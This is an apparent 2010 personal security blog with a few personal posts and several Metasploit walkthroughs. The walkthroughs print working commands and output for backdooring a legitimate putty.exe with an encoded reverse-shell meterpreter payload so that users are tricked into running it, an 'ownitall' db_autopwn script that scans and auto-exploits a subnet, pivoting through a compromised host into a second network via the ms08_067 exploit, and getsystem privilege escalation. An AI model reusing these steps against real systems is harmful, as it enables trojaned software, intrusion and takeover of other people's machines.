JoshuaGauthier.com

Motorola Droid

zwned — Mon, 19 Apr 2010 23:53:51 +0000

Posting from my laptop tethered to my new Motorola Droid. This phone is sick. Now my only regret is how long I waited to get it!

Persistent Meterpreter over Reverse HTTPS

zwned — Tue, 13 Apr 2010 16:21:51 +0000

SSL tunneled meterpreter sessions, Thanks HD.

Link

GCIA Gold Paper

zwned — Sun, 11 Apr 2010 01:37:00 +0000

So I’m writing my GCIA Gold paper on Network Data Visualization for Computer Network Defense. More than likely I’ll be posting some stuff regarding the research. Right now I am focusing on Open Source tools found on the DAVIX distribution. Anyone out there with some experience on the subject I would love to pick your brain.

msfencoded payloads into executables (-k)

zwned — Wed, 24 Mar 2010 20:33:36 +0000

For a while now it has been possible to add msfencoded payloads into executable. However the resulting files would not work as expected. ie You could trick a user into running a file which would in turn give you a meterpreter session but the user would soon find that something was amiss with the exe……not any more.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

./msfencode -h

Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: ‘\x00\xff’
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10

file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler…
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)

You’ll still need to migrate or your shell will terminate when the backdoored process is killed

msfconsole and db_autopwn

zwned — Sat, 06 Mar 2010 01:20:03 +0000

I just saw this on seclists.org.

HD Moore posted this to kick off db_autopwn via msfconsole RC script

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

GCIA Results

zwned — Sat, 06 Mar 2010 01:12:25 +0000

So I passed with an 88………..kind of disappointed I didn’t do better, ridiculous mistakes, oh well. I had two questions that were flat out wrong and I contacted the GIAC. Enough about that, now I just need to come up with a topic for my Gold paper. Any suggestions……………

Passworded Screensaver Bypass

zwned — Thu, 25 Feb 2010 23:00:52 +0000

The Relentless-coding blog just released a script for meterpreter that will bypass password protection for screensavers in Windows XP (SP2 & 3), Vista, and Windows 7. The script patches the lsass (you’ll need system level permissions) process to circumvent the password check. Once applied, an attacker can insert anything for the password to unlock. PaulDotCom has a video on vimeo demonstrating it.

Automatically Route Through New Subnets with Metasploit

zwned — Wed, 10 Feb 2010 02:44:41 +0000

One of the coolest features of any exploitation framework is the ability to further penetrate the network via the exploited host. Here is how to pivot an attack in Metasploit:

msf exploit(ms09_002_memory_corruption) > sessions -l


Active sessions

===============
  Id  Description  Tunnel

  --  -----------  ------

  1   Meterpreter  192.168.1.109:8080 -> 192.168.1.104:62239 
msf exploit(ms09_002_memory_corruption) > ifconfig

[*] exec: ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0d:29:d9:ec:cc

          inet addr:192.168.1.109  Bcast:192.168.1.255  Mask:255.255.255.0

          inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0

          TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0 txqueuelen:1000

          RX bytes:7542708 (7.5 MB)  TX bytes:2385453 (2.3 MB)

          Interrupt:19 Base address:0x2024
msf exploit(ms09_002_memory_corruption) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > route
Network routes

==============
    Subnet           Netmask          Gateway

    ------           -------          -------

    0.0.0.0          0.0.0.0          192.168.55.2

    192.168.55.0      255.255.255.0    192.168.55.140

    192.168.55.140    255.255.255.255  127.0.0.1

    127.0.0.0        255.0.0.0        127.0.0.1

    224.0.0.0        240.0.0.0        192.168.55.140

    255.255.255.255  255.255.255.255  192.168.55.140 
meterpreter >

Background session 1? [y/N]y
msf exploit(ms09_002_memory_corruption) > route add 192.168.55.0 255.255.255.0 1

msf exploit(ms09_002_memory_corruption) > route print
Active Routing Table

====================
   Subnet             Netmask            Gateway

   ------             -------            -------

   192.168.55.0        255.255.255.0      Session 1 
msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp

PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 
Payload options (windows/patchupmeterpreter/reverse_tcp):
   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique: seh, thread, process

   LHOST                      yes       The local address

   LPORT     4444             yes       The local port                       
Exploit target:
   Id  Name

   --  ----

   0   Automatic Targeting 
msf exploit(ms08_067_netapi) > set RHOST 192.168.55.128

RHOST => 192.168.55.128

msf exploit(ms08_067_netapi) > set LPORT 9000

LPORT => 9000

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109

LHOST => 192.168.1.109

msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English

[*] Selected Target: Windows 2003 SP2 English (NX)

[*] Triggering the vulnerability...

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (205835 bytes)...

[*] Upload completed.

[*] Meterpreter session 2 opened (192.168.1.109:9000 -> 192.168.1.104:62260)
meterpreter > execute -f cmd.exe -i

Process 3864 created.

Channel 1 created.

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> ipconfig

ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 6:
   Connection-specific DNS Suffix  . : localdomain

   IP Address. . . . . . . . . . . . : 192.168.55.128

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . : 192.168.55.2
C:\WINDOWS\system32>exit

meterpreter > Background session 2? [y/N]y

The problem is it requires a lot of typing. HD Moore has created a plug-in that automatically adds a route for previously unseen subnets when a new session opens up. Here is an example of its usage and output:

msf exploit(ms08_067_netapi) > load auto_add_route [*] Successfully loaded plugin: auto_add_route msf exploit(ms08_067_netapi) > exploit


[*] Started reverse handler on 192.168.1.1:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Triggering the vulnerability...

[*] Sending stage (725504 bytes)

[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.128:2355)

[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 1
meterpreter > background

msf exploit(ms08_067_netapi) > route print
Active Routing Table

====================
   Subnet             Netmask            Gateway

   ------             -------            -------

   192.168.1.0           255.255.255.0      Session 1

msf exploit(ms08_067_netapi) >

Awesome…..

GCIA

zwned — Sat, 06 Feb 2010 18:49:33 +0000

Thanks to Uncle Sam I will be taking the GCIA on the 27th of this month. Wish me luck, I doubt I will need it but I have heard that it is a ball buster. Im pretty confident I have the material down, and I will be taking the practice tests soon so I will have a bit of time to bone up on anything that I’m lacking.

meterpreter getsystem

zwned — Sat, 30 Jan 2010 02:27:05 +0000

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 2
…got system (via technique 2).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 3
…got system (via technique 3).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 4
…got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM